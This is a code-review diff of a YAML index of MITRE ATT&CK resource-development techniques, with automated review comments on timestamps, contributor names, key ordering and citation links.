+ description: Graham Edgecombe. (2024, February 7). Phishception – SendGrid
+ is abused to host phishing attacks impersonating itself. Retrieved October
+ 15, 2024.
+ url: https://www.netcraft.com/blog/popular-email-platform-used-to-impersonate-itself/
- source_name: MSTIC Nobelium Oct 2021
description: Microsoft Threat Intelligence Center. (2021, October 25). NOBELIUM
targeting delegated administrative privileges to facilitate broader attacks.
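Review bot: the two new entries (`Palo Alto Unit 42 Compromised Cloud Compute Credentials 2022` and `Netcraft SendGrid 2024`) need matching `(Citation: ...)` tags in the description; the visible description paragraph above cites only `MSTIC Nobelium Oct 2021`, so confirm the earlier paragraphs carry those citations or the references are dead. Minor style point: the Netcraft description is emitted as an unquoted plain scalar while the neighbouring Unit 42 and Awake Security descriptions are single-quoted; it parses correctly because the text contains no `: ` sequence, but the inconsistency comes from the emitter's quoting heuristic rather than from the data.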
@@ -52310,9 +52982,8 @@ resource-development:
url: https://www.microsoft.com/security/blog/2021/10/25/nobelium-targeting-delegated-administrative-privileges-to-facilitate-broader-attacks/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1586.002:
technique:
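Review bot: removing `spec_version: '2.1'` here, and in every other technique object in this patch, means the embedded objects are no longer self-describing STIX 2.1 SDOs. Any consumer that hands these objects to a STIX library which requires `spec_version` will fail, so the PR description should state that the field is intentionally dropped from the index and that the objects are not meant to be used as standalone STIX. The `x_mitre_attack_spec_version` change from `2.1.0` to `3.2.0` in the same hunk is consistent with a refresh from the current ATT&CK release.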
@@ -52363,11 +53034,10 @@ resource-development:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1608.001:
technique:
- modified: '2023-04-11T23:22:49.534Z'
+ modified: '2024-10-16T20:13:40.501Z'
name: Upload Malware
description: |-
Adversaries may upload malware to third-party or adversary controlled infrastructure to make it accessible during targeting. Malicious software can include payloads, droppers, post-compromise tools, backdoors, and a variety of other malicious content. Adversaries may upload malware to support their operations, such as making a payload available to a victim network to enable [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105) by placing it on an Internet accessible web server.
@@ -52380,7 +53050,7 @@ resource-development:
phase_name: resource-development
x_mitre_contributors:
- Kobi Haimovich, CardinalOps
- - Goldstein Menachem
+ - Menachem Goldstein
x_mitre_deprecated: false
x_mitre_detection: |-
If infrastructure or patterns in malware have been previously identified, internet scanning may uncover when an adversary has staged malware to make it accessible for targeting.
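Review bot: the contributor rename from `Goldstein Menachem` to `Menachem Goldstein` is applied here and again for T1584 and T1608.005 later in this patch; grep the whole file for the old spelling before merging so the same person does not remain listed under two names in techniques that were not touched by this regeneration.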
@@ -52415,22 +53085,25 @@ resource-development:
url: https://blog.talosintelligence.com/ipfs-abuse/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1583.001:
technique:
- modified: '2024-04-13T14:03:04.511Z'
+ modified: '2024-09-25T15:26:00.047Z'
name: Domains
description: |-
Adversaries may acquire domains that can be used during targeting. Domain names are the human readable names used to represent one or more IP addresses. They can be purchased or, in some cases, acquired for free.
- Adversaries may use acquired domains for a variety of purposes, including for [Phishing](https://attack.mitre.org/techniques/T1566), [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), and Command and Control.(Citation: CISA MSS Sep 2020) Adversaries may choose domains that are similar to legitimate domains, including through use of homoglyphs or use of a different top-level domain (TLD).(Citation: FireEye APT28)(Citation: PaypalScam) Typosquatting may be used to aid in delivery of payloads via [Drive-by Compromise](https://attack.mitre.org/techniques/T1189). Adversaries may also use internationalized domain names (IDNs) and different character sets (e.g. Cyrillic, Greek, etc.) to execute "IDN homograph attacks," creating visually similar lookalike domains used to deliver malware to victim machines.(Citation: CISA IDN ST05-016)(Citation: tt_httrack_fake_domains)(Citation: tt_obliqueRAT)(Citation: httrack_unhcr)(Citation: lazgroup_idn_phishing) Different URIs/URLs may also be dynamically generated to uniquely serve malicious content to victims.(Citation: iOS URL Scheme)(Citation: URI)(Citation: URI Use)(Citation: URI Unique)
+ Adversaries may use acquired domains for a variety of purposes, including for [Phishing](https://attack.mitre.org/techniques/T1566), [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), and Command and Control.(Citation: CISA MSS Sep 2020) Adversaries may choose domains that are similar to legitimate domains, including through use of homoglyphs or use of a different top-level domain (TLD).(Citation: FireEye APT28)(Citation: PaypalScam) Typosquatting may be used to aid in delivery of payloads via [Drive-by Compromise](https://attack.mitre.org/techniques/T1189). Adversaries may also use internationalized domain names (IDNs) and different character sets (e.g. Cyrillic, Greek, etc.) to execute "IDN homograph attacks," creating visually similar lookalike domains used to deliver malware to victim machines.(Citation: CISA IDN ST05-016)(Citation: tt_httrack_fake_domains)(Citation: tt_obliqueRAT)(Citation: httrack_unhcr)(Citation: lazgroup_idn_phishing)
+
+ Different URIs/URLs may also be dynamically generated to uniquely serve malicious content to victims (including one-time, single use domain names).(Citation: iOS URL Scheme)(Citation: URI)(Citation: URI Use)(Citation: URI Unique)
Adversaries may also acquire and repurpose expired domains, which may be potentially already allowlisted/trusted by defenders based on an existing reputation/history.(Citation: Categorisation_not_boundary)(Citation: Domain_Steal_CC)(Citation: Redirectors_Domain_Fronting)(Citation: bypass_webproxy_filtering)
Domain registrars each maintain a publicly viewable database that displays contact information for every registered domain. Private WHOIS services display alternative information, such as their own company data, rather than the owner of the domain. Adversaries may use such private WHOIS services to obscure information about who owns a purchased domain. Adversaries may further interrupt efforts to track their infrastructure by using varied registration information and purchasing domains with different domain registrars.(Citation: Mandiant APT1)
+
+ In addition to legitimately purchasing a domain, an adversary may register a new domain in a compromised environment. For example, in AWS environments, adversaries may leverage the Route53 domain service to register a domain and create hosted zones pointing to resources of the threat actor’s choosing.(Citation: Invictus IR DangerDev 2024)
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: resource-development
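Review bot: the new Route53 paragraph cites `(Citation: Invictus IR DangerDev 2024)` and the matching `external_references` entry is added in a later hunk, so the citation resolves. Two things to check in this hunk: the bare `+` lines are blank lines inside a `|-` block scalar and are kept as paragraph breaks, which appears intended; and the first long changed line differs from its deleted counterpart only by the parenthetical "(including one-time, single use domain names)" and the sentence split, so a word-level diff would have shown the edit without re-emitting the whole paragraph.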
@@ -52451,7 +53124,7 @@ resource-development:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- PRE
- x_mitre_version: '1.3'
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Domain Name: Passive DNS'
- 'Domain Name: Domain Registration'
@@ -52490,6 +53163,10 @@ resource-development:
description: 'FireEye. (2015). APT28: A WINDOW INTO RUSSIA’S CYBER ESPIONAGE
OPERATIONS?. Retrieved August 19, 2015.'
url: https://web.archive.org/web/20151022204649/https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-apt28.pdf
+ - source_name: Invictus IR DangerDev 2024
+ description: Invictus Incident Response. (2024, January 31). The curious case
+ of DangerDev@protonmail.me. Retrieved March 19, 2024.
+ url: https://www.invictus-ir.com/news/the-curious-case-of-dangerdev-protonmail-me
- source_name: Domain_Steal_CC
description: Krebs, B. (2018, November 13). That Domain You Forgot to Renew?
Yeah, it’s Now Stealing Credit Cards. Retrieved September 20, 2019.
@@ -52545,7 +53222,6 @@ resource-development:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1608.002:
technique:
@@ -52603,7 +53279,6 @@ resource-development:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1583.004:
technique:
@@ -52683,7 +53358,6 @@ resource-development:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1585.002:
technique:
@@ -52743,7 +53417,6 @@ resource-development:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1588.001:
technique:
@@ -52765,7 +53438,7 @@ resource-development:
description: 'FireEye. (2014). SUPPLY CHAIN ANALYSIS: From Quartermaster to
SunshopFireEye. Retrieved March 6, 2017.'
url: https://www.mandiant.com/resources/supply-chain-analysis-from-quartermaster-to-sunshop
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-17T16:15:52.805Z'
name: Malware
description: |-
Adversaries may buy, steal, or download malware that can be used during targeting. Malicious software can include payloads, droppers, post-compromise tools, backdoors, packers, and C2 protocols. Adversaries may acquire malware to support their operations, obtaining a means for maintaining control of remote machines, evading defenses, and executing post-compromise behaviors.
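Review bot: `modified` moves backwards in this hunk, from '2022-04-25T14:00:00.188Z' to '2021-10-17T16:15:52.805Z'. The same regression appears for T1586 (2023-05-09 to 2023-04-11), T1584.005 (2022-05-11 to 2022-04-19), T1585.001, T1587.004, T1608.003 and T1584.002 further down. A refresh from a newer ATT&CK release should never lower `modified`; the repeated `...T14:00:00.188Z` values being replaced look like a batch-stamped timestamp from an earlier import, so confirm which source bundle is authoritative before merging, because tooling that uses `modified` to select the newest object version would now prefer the previous copies of these techniques.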
@@ -52784,42 +53457,10 @@ resource-development:
x_mitre_data_sources:
- 'Malware Repository: Malware Metadata'
- 'Malware Repository: Malware Content'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1583.003:
technique:
- x_mitre_platforms:
- - PRE
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--79da0971-3147-4af6-a4f5-e8cd447cd795
- type: attack-pattern
- created: '2020-10-01T00:44:23.935Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1583.003
- url: https://attack.mitre.org/techniques/T1583/003
- - source_name: TrendmicroHideoutsLease
- description: 'Max Goncharov. (2015, July 15). Criminal Hideouts for Lease:
- Bulletproof Hosting Services. Retrieved March 6, 2017.'
- url: https://documents.trendmicro.com/assets/wp/wp-criminal-hideouts-for-lease.pdf
- - source_name: ThreatConnect Infrastructure Dec 2020
- url: https://threatconnect.com/blog/infrastructure-research-hunting/
- description: 'ThreatConnect. (2020, December 15). Infrastructure Research
- and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.'
- - source_name: Mandiant SCANdalous Jul 2020
- url: https://www.mandiant.com/resources/scandalous-external-detection-using-network-scan-data-and-automation
- description: Stephens, A. (2020, July 13). SCANdalous! (External Detection
- Using Network Scan Data and Automation). Retrieved October 12, 2021.
- - source_name: Koczwara Beacon Hunting Sep 2021
- url: https://michaelkoczwara.medium.com/cobalt-strike-c2-hunting-with-shodan-c448d501a6e2
- description: Koczwara, M. (2021, September 7). Hunting Cobalt Strike C2 with
- Shodan. Retrieved October 12, 2021.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-10-15T13:22:11.113Z'
name: Virtual Private Server
description: |-
Adversaries may rent Virtual Private Servers (VPSs) that can be used during targeting. There exist a variety of cloud service providers that will sell virtual machines/containers as a service. By utilizing a VPS, adversaries can make it difficult to physically tie back operations to them. The use of cloud infrastructure can also make it easier for adversaries to rapidly provision, modify, and shut down their infrastructure.
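Review bot: this hunk deletes `x_mitre_platforms`, `x_mitre_domains`, `object_marking_refs`, `id`, `type`, `created`, `created_by_ref` and the entire `external_references` block of T1583.003, and the following hunk re-adds every one of them (plus `revoked: false` and `x_mitre_deprecated: false`) in a different key order. None of the four references changed apart from their sequence, so the roughly thirty deleted and re-added lines are ordering noise that hides the one real change, the `modified` timestamp. Emitting keys in a fixed order in the generator, or reviewing with a YAML-aware diff, would keep these refreshes reviewable.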
@@ -52828,22 +53469,53 @@ resource-development:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: resource-development
+ x_mitre_deprecated: false
x_mitre_detection: |-
Once adversaries have provisioned a VPS (ex: for use as a command and control server), internet scans may reveal servers that adversaries have acquired. Consider looking for identifiable patterns such as services listening, certificates in use, SSL/TLS negotiation features, or other response artifacts associated with adversary C2 software.(Citation: ThreatConnect Infrastructure Dec 2020)(Citation: Mandiant SCANdalous Jul 2020)(Citation: Koczwara Beacon Hunting Sep 2021)
Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Command and Control.
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Internet Scan: Response Content'
- 'Internet Scan: Response Metadata'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--79da0971-3147-4af6-a4f5-e8cd447cd795
+ created: '2020-10-01T00:44:23.935Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1583/003
+ external_id: T1583.003
+ - source_name: Koczwara Beacon Hunting Sep 2021
+ description: Koczwara, M. (2021, September 7). Hunting Cobalt Strike C2 with
+ Shodan. Retrieved October 12, 2021.
+ url: https://michaelkoczwara.medium.com/cobalt-strike-c2-hunting-with-shodan-c448d501a6e2
+ - source_name: TrendmicroHideoutsLease
+ description: 'Max Goncharov. (2015, July 15). Criminal Hideouts for Lease:
+ Bulletproof Hosting Services. Retrieved March 6, 2017.'
+ url: https://documents.trendmicro.com/assets/wp/wp-criminal-hideouts-for-lease.pdf
+ - source_name: Mandiant SCANdalous Jul 2020
+ description: Stephens, A. (2020, July 13). SCANdalous! (External Detection
+ Using Network Scan Data and Automation). Retrieved October 12, 2021.
+ url: https://www.mandiant.com/resources/scandalous-external-detection-using-network-scan-data-and-automation
+ - source_name: ThreatConnect Infrastructure Dec 2020
+ description: 'ThreatConnect. (2020, December 15). Infrastructure Research
+ and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.'
+ url: https://threatconnect.com/blog/infrastructure-research-hunting/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1584:
technique:
- modified: '2024-03-28T03:53:28.299Z'
+ modified: '2024-10-16T20:06:03.570Z'
name: Compromise Infrastructure
description: |-
Adversaries may compromise third-party infrastructure that can be used during targeting. Infrastructure solutions include physical or cloud servers, domains, network devices, and third-party web and DNS services. Instead of buying, leasing, or renting infrastructure an adversary may compromise infrastructure and use it during other phases of the adversary lifecycle.(Citation: Mandiant APT1)(Citation: ICANNDomainNameHijacking)(Citation: Talos DNSpionage Nov 2018)(Citation: FireEye EPS Awakens Part 2) Additionally, adversaries may compromise numerous machines to form a botnet they can leverage.
@@ -52857,7 +53529,7 @@ resource-development:
x_mitre_contributors:
- Jeremy Galloway
- Shailesh Tiwary (Indian Army)
- - Goldstein Menachem
+ - Menachem Goldstein
x_mitre_deprecated: false
x_mitre_detection: "Consider monitoring for anomalous changes to domain registrant
information and/or domain resolution information that may indicate the compromise
@@ -52944,11 +53616,10 @@ resource-development:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1586:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2023-04-11T01:08:56.774Z'
name: Compromise Accounts
description: "Adversaries may compromise accounts with services that can be
used during targeting. For operations incorporating social engineering, the
@@ -53008,7 +53679,6 @@ resource-development:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1584.005:
technique:
@@ -53050,7 +53720,7 @@ resource-development:
servers.(Citation: Dell Dridex Oct 2015) With a botnet at their disposal,
adversaries may perform follow-on activity such as large-scale [Phishing](https://attack.mitre.org/techniques/T1566)
or Distributed Denial of Service (DDoS).'
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-04-19T15:55:58.319Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: Botnet
x_mitre_detection: Much of this activity will take place outside the visibility
@@ -53065,7 +53735,6 @@ resource-development:
x_mitre_is_subtechnique: true
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1608:
technique:
@@ -53156,11 +53825,10 @@ resource-development:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1608.005:
technique:
- modified: '2024-04-13T14:03:24.673Z'
+ modified: '2024-10-16T20:09:41.391Z'
name: Link Target
description: "Adversaries may put in place resources that are referenced by
a link that can be used during targeting. An adversary may rely upon a user
@@ -53193,15 +53861,16 @@ resource-development:
to malicious pages.(Citation: Netskope GCP Redirection)(Citation: Netskope
Cloud Phishing)(Citation: Intezer App Service Phishing)(Citation: Cofense-redirect)
In addition, adversaries may serve a variety of malicious links through uniquely
- generated URIs/URLs.(Citation: iOS URL Scheme)(Citation: URI)(Citation: URI
- Use)(Citation: URI Unique) Finally, adversaries may take advantage of the
- decentralized nature of the InterPlanetary File System (IPFS) to host link
- targets that are difficult to remove.(Citation: Talos IPFS 2022)"
+ generated URIs/URLs (including one-time, single use links).(Citation: iOS
+ URL Scheme)(Citation: URI)(Citation: URI Use)(Citation: URI Unique) Finally,
+ adversaries may take advantage of the decentralized nature of the InterPlanetary
+ File System (IPFS) to host link targets that are difficult to remove.(Citation:
+ Talos IPFS 2022)"
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: resource-development
x_mitre_contributors:
- - Goldstein Menachem
+ - Menachem Goldstein
- Hen Porcilan
- Diyar Saadi Ali
- Nikola Kovac
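Review bot: the only content change in the re-wrapped description is the parenthetical "(including one-time, single use links)"; the other changed lines are the double-quoted scalar being re-folded at the emitter's column limit. Other descriptions in this file already use `|-` block scalars (see `description: |-` for Upload Malware and Domains above), so emitting every description as a block scalar would stop a one-phrase edit from rewriting the whole paragraph in the diff and would also spare reviewers the mixed `"..."`, `'...'` and `|-` styles.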
@@ -53285,7 +53954,6 @@ resource-development:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1583.006:
technique:
@@ -53339,7 +54007,6 @@ resource-development:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1585.003:
technique:
@@ -53390,36 +54057,10 @@ resource-development:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.0.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1588.002:
technique:
- x_mitre_platforms:
- - PRE
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - SOCCRATES
- - Mnemonic AS
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--a2fdce72-04b2-409a-ac10-cc1695f4fce0
- type: attack-pattern
- created: '2020-10-01T02:08:33.977Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1588.002
- url: https://attack.mitre.org/techniques/T1588/002
- - source_name: Recorded Future Beacon 2019
- url: https://www.recordedfuture.com/identifying-cobalt-strike-servers/
- description: 'Recorded Future. (2019, June 20). Out of the Blue: How Recorded
- Future Identified Rogue Cobalt Strike Servers. Retrieved October 16, 2020.'
- - source_name: Analyzing CS Dec 2020
- url: https://www.randhome.io/blog/2020/12/20/analyzing-cobalt-strike-for-fun-and-profit/
- description: Maynier, E. (2020, December 20). Analyzing Cobalt Strike for
- Fun and Profit. Retrieved October 12, 2021.
- modified: '2021-10-17T16:17:55.499Z'
+ modified: '2024-09-16T16:20:16.431Z'
name: Tool
description: |-
Adversaries may buy, steal, or download software tools that can be used during targeting. Tools can be open or closed source, free or commercial. A tool can be used for malicious purposes by an adversary, but (unlike malware) were not intended to be used for those purposes (ex: [PsExec](https://attack.mitre.org/software/S0029)). Tool acquisition can involve the procurement of commercial software licenses, including for red teaming tools such as [Cobalt Strike](https://attack.mitre.org/software/S0154). Commercial software may be obtained through purchase, stealing licenses (or licensed copies of the software), or cracking trial versions.(Citation: Recorded Future Beacon 2019)
@@ -53428,21 +54069,47 @@ resource-development:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: resource-development
+ x_mitre_contributors:
+ - SOCCRATES
+ - Mnemonic AS
+ x_mitre_deprecated: false
x_mitre_detection: |-
In some cases, malware repositories can also be used to identify features of tool use associated with an adversary, such as watermarks in [Cobalt Strike](https://attack.mitre.org/software/S0154) payloads.(Citation: Analyzing CS Dec 2020)
Much of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on post-compromise phases of the adversary lifecycle.
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Malware Repository: Malware Metadata'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--a2fdce72-04b2-409a-ac10-cc1695f4fce0
+ created: '2020-10-01T02:08:33.977Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1588/002
+ external_id: T1588.002
+ - source_name: Analyzing CS Dec 2020
+ description: Maynier, E. (2020, December 20). Analyzing Cobalt Strike for
+ Fun and Profit. Retrieved October 12, 2021.
+ url: https://www.randhome.io/blog/2020/12/20/analyzing-cobalt-strike-for-fun-and-profit/
+ - source_name: Recorded Future Beacon 2019
+ description: 'Recorded Future. (2019, June 20). Out of the Blue: How Recorded
+ Future Identified Rogue Cobalt Strike Servers. Retrieved September 16, 2024.'
+ url: https://www.recordedfuture.com/blog/identifying-cobalt-strike-servers
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1584.006:
technique:
- modified: '2023-04-12T20:19:21.620Z'
+ modified: '2024-10-15T16:44:09.114Z'
name: Web Services
description: 'Adversaries may compromise access to third-party web services that
can be used during targeting. A variety of popular websites exist for legitimate
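Review bot: buried inside the T1588.002 key reshuffle is a real change: the `Recorded Future Beacon 2019` reference now points at `https://www.recordedfuture.com/blog/identifying-cobalt-strike-servers` with "Retrieved September 16, 2024" instead of `https://www.recordedfuture.com/identifying-cobalt-strike-servers/` with "Retrieved October 16, 2020". Call that out in the PR description so it is not lost among the reordering. The same path migration is applied to the Turla reference in the next hunk, so also check whether the `Recorded Future Beacon Certificates` URL (`https://www.recordedfuture.com/cobalt-strike-servers/`, deleted for T1588 further down) is updated in the same way when it is re-added.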
@@ -53488,17 +54155,16 @@ resource-development:
external_id: T1584.006
- source_name: Recorded Future Turla Infra 2020
description: 'Insikt Group. (2020, March 12). Swallowing the Snake’s Tail:
- Tracking Turla Infrastructure. Retrieved October 20, 2020.'
- url: https://www.recordedfuture.com/turla-apt-infrastructure/
+ Tracking Turla Infrastructure. Retrieved September 16, 2024.'
+ url: https://www.recordedfuture.com/research/turla-apt-infrastructure
- source_name: ThreatConnect Infrastructure Dec 2020
description: 'ThreatConnect. (2020, December 15). Infrastructure Research
and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.'
url: https://threatconnect.com/blog/infrastructure-research-hunting/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1585.001:
technique:
@@ -53524,7 +54190,7 @@ resource-development:
description: Ryan, T. (2010). “Getting In Bed with Robin Sage.”. Retrieved
March 6, 2017.
url: http://media.blackhat.com/bh-us-10/whitepapers/Ryan/BlackHat-USA-2010-Ryan-Getting-In-Bed-With-Robin-Sage-v1.0.pdf
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-16T17:37:34.563Z'
name: Social Media Accounts
description: "Adversaries may create and cultivate social media accounts that
can be used during targeting. Adversaries can create social media accounts
@@ -53556,8 +54222,6 @@ resource-development:
x_mitre_data_sources:
- 'Network Traffic: Network Traffic Content'
- 'Persona: Social Media'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1587.004:
technique:
@@ -53584,7 +54248,7 @@ resource-development:
url: https://www.irongeek.com/i.php?page=videos/bsidescharm2017/bsidescharm-2017-t111-microsoft-patch-analysis-for-exploitation-stephen-sims
description: Stephen Sims. (2017, April 30). Microsoft Patch Analysis for
Exploitation. Retrieved October 16, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:07:53.803Z'
name: Exploits
description: |-
Adversaries may develop exploits that can be used during targeting. An exploit takes advantage of a bug or vulnerability in order to cause unintended or unanticipated behavior to occur on computer hardware or software. Rather than finding/modifying exploits from online or purchasing them from exploit vendors, an adversary may develop their own exploits.(Citation: NYTStuxnet) Adversaries may use information acquired via [Vulnerabilities](https://attack.mitre.org/techniques/T1588/006) to focus exploit development efforts. As part of the exploit development process, adversaries may uncover exploitable vulnerabilities through methods such as fuzzing and patch analysis.(Citation: Irongeek Sims BSides 2017)
@@ -53608,8 +54272,6 @@ resource-development:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1608.003:
technique:
@@ -53635,7 +54297,7 @@ resource-development:
url: https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html
description: Kovar, R. (2017, December 11). Tall Tales of Hunting with TLS/SSL
Certificates. Retrieved October 16, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-16T17:47:46.409Z'
name: Install Digital Certificate
description: "Adversaries may install SSL/TLS certificates that can be used
during targeting. SSL/TLS certificates are files that can be installed on
@@ -53669,8 +54331,6 @@ resource-development:
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Internet Scan: Response Content'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1584.002:
technique:
@@ -53718,7 +54378,7 @@ resource-development:
Adversaries may compromise third-party DNS servers that can be used during targeting. During post-compromise activity, adversaries may utilize DNS traffic for various tasks, including for Command and Control (ex: [Application Layer Protocol](https://attack.mitre.org/techniques/T1071)). Instead of setting up their own DNS servers, adversaries may compromise third-party DNS servers in support of operations.
By compromising DNS servers, adversaries can alter DNS records. Such control can allow for redirection of an organization's traffic, facilitating Collection and Credential Access efforts for the adversary.(Citation: Talos DNSpionage Nov 2018)(Citation: FireEye DNS Hijack 2019) Additionally, adversaries may leverage such control in conjunction with [Digital Certificates](https://attack.mitre.org/techniques/T1588/004) to redirect traffic to adversary-controlled infrastructure, mimicking normal trusted network communications.(Citation: FireEye DNS Hijack 2019)(Citation: Crowdstrike DNS Hijack 2019) Adversaries may also be able to silently create subdomains pointed at malicious servers without tipping off the actual owner of the DNS server.(Citation: CiscoAngler)(Citation: Proofpoint Domain Shadowing)
